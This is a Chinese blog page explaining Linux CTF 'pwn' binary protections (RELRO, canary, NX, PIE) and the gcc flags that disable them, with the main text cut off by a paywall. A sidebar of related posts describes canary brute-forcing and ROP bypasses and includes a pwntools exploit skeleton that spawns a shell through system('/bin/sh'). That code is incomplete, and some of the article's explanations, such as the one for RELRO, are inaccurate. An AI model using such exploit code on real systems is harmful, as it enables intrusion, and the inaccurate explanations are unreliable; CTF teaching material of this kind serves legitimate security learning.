PWN保护机制以及编译方法

最新推荐文章于 2024-12-01 21:35:58 发布
原创 最新推荐文章于 2024-12-01 21:35:58 发布 · 3k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #PWN #PWN保护机制 #CTF

本文详细介绍了PWN中的四种保护机制:RELRO、Stack、NX和PIE,并通过实例展示了如何在GCC中启用或禁用这些保护措施。通过对比分析不同保护级别的二进制文件,帮助读者理解每种保护机制的具体作用。

PWN保护

引入

Ctf中的pwn题,在利用gcc编译的时候,保护是如何开启的,如何编译出来的,保护都有什么由于在ctf中,大部分都是linux pwn,Windows pwn很少见,所以我这里以linux pwn来举例。

PWN的保护

在pwn里,保护一共是四种分别是RELRO、Stack、NX、PIE。
1.RELRO(ReLocation Read-Only):分为两种情况,第一种情况是Partial RELRO,这种情况是部分开启堆栈地址随机化,got表可写,第二种,Full RELRO是全部开启,got表不可写,Got表是全局偏移表,里面包含的是外部定义的符号相应的条目的数据段中,PLT表,是过程链接表/内部函数表,linux延迟绑定,但是最后还是要连接到Got,PLT表只是为一个过渡的作用。
2.Stack(canary):这个保护其实就是在你调用的函数的时候,在栈帧中插入一个随机数,在函数执行完成返回之前,来校验随机数是否被改变,来判断是否被栈溢出,这个我们也俗称为canary(金丝雀),栈保护技术。
3.NX(no execute):为栈不可知性,也就是栈上的数据不可以当作代码区执行的作用。
4.PIE(Position Independent Executable):PIE的中文叫做,地址无关可执行文件,是针对.text(代码段),.data(数据段),.bss(未初始化全局变量段)来做的保护,正常每一次加载程序,加载地址是固定的,但是PIE保护开启,每次程序启动的时候都会变换加载地址。

编译

在gcc中,利用默认参数进行生成,默认生成的是RELRO、PIE、NX保护是全开的情况,但是有一些题,会针对题型的不同,来更变所开启的保护机制。

在这里插入图片描述从头开始,关闭所有的保护开始关闭所有保护开始gcc -z e

最低0.47元/天 解锁文章
pwn-canary绕过和PIE(未完待续)
m0_75234353的博客
05-30 1270
看见了fork函数,那就通过爆破得出canary对于 Canary,但是同一个进程中的不同线程的 Canary 是相同的,并且通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 打开sub_128A函数 明显的溢出发现后门函数 开始计算溢出大小0x70-0x80=104①先逐字爆破出canary的值②直接溢出到返回地址,覆盖为后门函数的地址。但这道题开了PIE保护,而PIE是代码段,数据段
2019.11.6 unctfpwn题——简单绕过pie
DSR446的博客
11-06 3076
这篇安全客关于pie和bapass绕过写的蛮好的! 看到函数最后返回到v1(),而且上一个函数的开辟的空间比后一个函数开辟的函数大,我们想到可以在前一个函数中提早将后门函数布置好,因为弹栈并不会是栈中的数据变化,除非往栈中写数据。 我们现在就通过gdb我们需要往栈的拿个位置写后门函数。 我们可以看见第一个数组的位置和后面 的v2()之间隔了0xc个字节。还有需要注意的是程序是将一个函数...
PWN · ret2text | PIE 】[NISACTF 2022]ezpie
Mr_Fmnwon的博客
05-31 2654
所接触的PIE保护的第一题,也非常简单。随着刷题的深入,各种保护的开启肯定是免不了的,对此多做总结,总是好的。
PWN--保护机制
2401_82918917的博客
11-25 339
Linux ELF文件的保护机制主要分为四种:Canary、NX、PIE、RELRO。
pwn学习---保护机制
gclome的博客
03-20 2766
操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就不能直接执行栈上的数据,存在ASLR(PIE)的话各个系统调用的地址就是随机化的。 解读: Arch: i386-32-little ...
红队专题-REVERSE汇编/二进制PWN/逆向/反编译
aming小老弟
10-10 2688
ROP(Return-Oriented Programming)链是一种计算机安全领域中的攻击技术,用于绕过内存执行保护措施,实现利用漏洞进行代码注入和控制流劫持。由一系列已存在于程序内存中的代码片段(称为gadget)组成的,这些片段通常是程序的合法指令序列。通过将这些gadget按照特定的顺序串联起来,攻击者可以构造出一条可执行的ROP链,用于实现特定的攻击目的。ROP链的基本原理依赖于已存在的代码片段,而不是插入自定义的恶意代码。这样可以避免执行数据区域中的恶意代码,
PWN】03.Linux-User Mode-栈溢出-x86-基本ROP
weixin_52553215的博客
11-23 4445
检查保护:checksec 文件名 编译并关闭栈保护:gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c 查看程序使用了哪些函数:objdump -t -j .test.read(推荐使用ida)
pwn中常见的保护
biu801的博客
06-09 769
checksec 可以查看程序开启了哪些保护。
Pwn的常见保护介绍
educat0r的博客
02-16 1537
一:canary Canary是金丝雀的意思。技术上表示最先的测试的意思。这个来自以前挖煤的时候,矿工都会先把金丝雀放进矿洞,或者挖煤的时候一直带着金丝雀。金丝雀对甲烷和一氧化碳浓度比较敏感,会先报警。所以大家都用canary来搞最先的测试。stack canary表示栈的报警保护。 在函数返回值之前添加的一串随机数(不超过机器字长),末位为/x00(提供了覆盖最后一字节输出泄露canary的可...
pwn四种基本保护
空舟的博客
12-03 915
前言 学习pwn,了解到的四种basic protection 1.Stack Guard • 做完function prologue①的时候回将随机生成的乱数压入stack中,function return前会检查乱数是否又被更动过,若发现被更动则立即结束程式 • 又称canary 金丝雀② 注释: ①function prologue:移动 RSP 和保存寄存器的动作一般处在函数的开头,叫做 function prologue ②canary:看视频讲的有一个了解,在煤矿中有毒或易燃气体的存在,常引起井
缓冲区溢出的保护机制
nibiru_holmes的博客
03-10 9094
本文转载自:http://yunnigu.dropsec.xyz/2016/10/08/checksec及其包含的保护机制/ checksec及其包含的保护机制 今天在研究liunx下栈溢出的时候发现自己对各种保护机制并不是特别了解,因此就这方面的知识在网上查找了一些资料并总结了一些心得和大家分享。 操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安
ctf(pwn) canary保护机制讲解 与 解密方法介绍
半岛铁盒的博客
03-03 2933
Canary保护机制 canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻
PWN的简单了解
cyy001128的博客
12-01 1516
Pwn 是一个骇客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:"You just got pwned!")。在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或个人电脑)、网站、闸道装置、或是应用程序,"pwn"在这一方面的意思是攻破("to compromise",危及、损害)或是控制("to control")。
国赛your_pwnPIE保护
playmaker的博客
05-13 2100
题目主要代码如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-110h] unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL);...
pwn(基础的栈溢出-上)
2302_80935968的博客
05-16 1418
编译器使用堆栈传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量栈的特点:后进先出的数据结构,栈的结构是从进程高地址向进程低地址生长这里说一下寄存器:寄存器是处理器加工数据或运行程序的重要载体,用于存放程序执行中用到的数据和指令。因此函数调用栈的实现与处理器寄存器组密切相关。最初的8086中寄存器是16位,每个都有特殊用途,寄存器名城反映其不同用途。由于IA32平台采用平面寻址模式,对特殊寄存器的需求大大降低,但由于历史原因,这些寄存器名称被保留下来。
基础知识——程序保护
qq_17512883的博客
05-13 1535
关于程序的保护机制,虽然网上容易找到大量的资料,但是相对比较全面而又易懂的介绍却不多,本人对网上的资料进行了收集整理,也会加入一些自己的理解与实践。对程序的保护机制种类很多,也会随着本人的了解,陆续加入。但是作者本人作为初学者,能力有限,知识体系也不是很完善,如有出错的地方,烦请批评指正。 我们先来看一个实例,使用pwntools的checksec对一个程序进行检测 RELRO(Relocation Read-Only): 设置符号重定位表格为只读或在程序启动时就解析并绑定所有动态符号,从而减
RELRO (ReLocation Read-Only)保护纯新手入门(一)
qq_66690477的博客
05-17 5926
RELRO,
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 4567
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
Linux pwn入门教程(7)——PIE与bypass思路
子曰小玖的博客
06-04 2759
https://bbs.ichunqiu.com/thread-43627-1-1.html 0x00 PIE简介 在之前的文章中我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆栈,转向bss或者其他地址固定的内存块。而PIE(position...
pwn题目文件开启pie和nx保护如何解题
最新发布
10-16
开启PIE(位置无关可执行文件)和NX(不可执行栈)保护的PWN题目文件,解题时需要综合考虑这两种保护机制带来的影响。 PIE保护会使程序每次加载的基地址随机化,导致无法直接使用固定的地址来进行利用。而NX保护则禁止栈和BSS段的执行权限,不能直接使用栈上的shellcode。 对于这种情况,可采用ROP(返回导向编程)技术。ROP通过在程序中寻找已有的代码片段(Gadget),将它们组合成一条执行链,从而达到执行任意代码的目的。若程序较为复杂或者是静态编译的,可以使用ROPgadget工具方便地生成ROP利用链。不过有时无法直接用ROPgadget找到利用链,就需要手动分析程序来实现getshell [^4]。 同时,根据已知保护机制推测考点也能辅助解题。虽然没有直接针对开启PIE和NX保护的考点描述,但已知如NX没开可能考ret2shellcode,PIE没开、RELRO半开、NX开启、金丝雀未开可能考ret2text ,可以以此类推,结合开启PIE和NX的情况进行分析 [^1]。 以下是一个示例代码框架(并非完整可运行代码)展示如何使用`pwntools`库和ROPgadget工具来解决此类问题: ```python from pwn import * from ropgadget import * # 设置上下文 context(arch='amd64', os='linux', log_level='debug') # 连接目标程序 # io = process('./pwn') io = remote('pwn.challenge.ctf.show', 12345) # 利用ROPgadget寻找Gadget rop = ROP('./pwn') # 构造ROP链 # 这里需要根据具体情况选择合适的Gadget rop.call('puts', [elf.got['puts']]) rop.call('main') # 发送ROP链 payload = cyclic(offset) + rop.chain() io.sendline(payload) # 接收输出并解析puts函数的真实地址 puts_addr = u64(io.recvline().strip().ljust(8, b'\x00')) # 计算基地址 base_addr = puts_addr - elf.symbols['puts'] # 重新构造ROP链,调用system函数执行shell rop = ROP('./pwn') rop.address = base_addr bin_sh = next(elf.search(b'/bin/sh')) rop.call('system', [bin_sh]) # 发送最终的ROP链 payload = cyclic(offset) + rop.chain() io.sendline(payload) # 进入交互模式 io.interactive() ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

逆向萌新

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值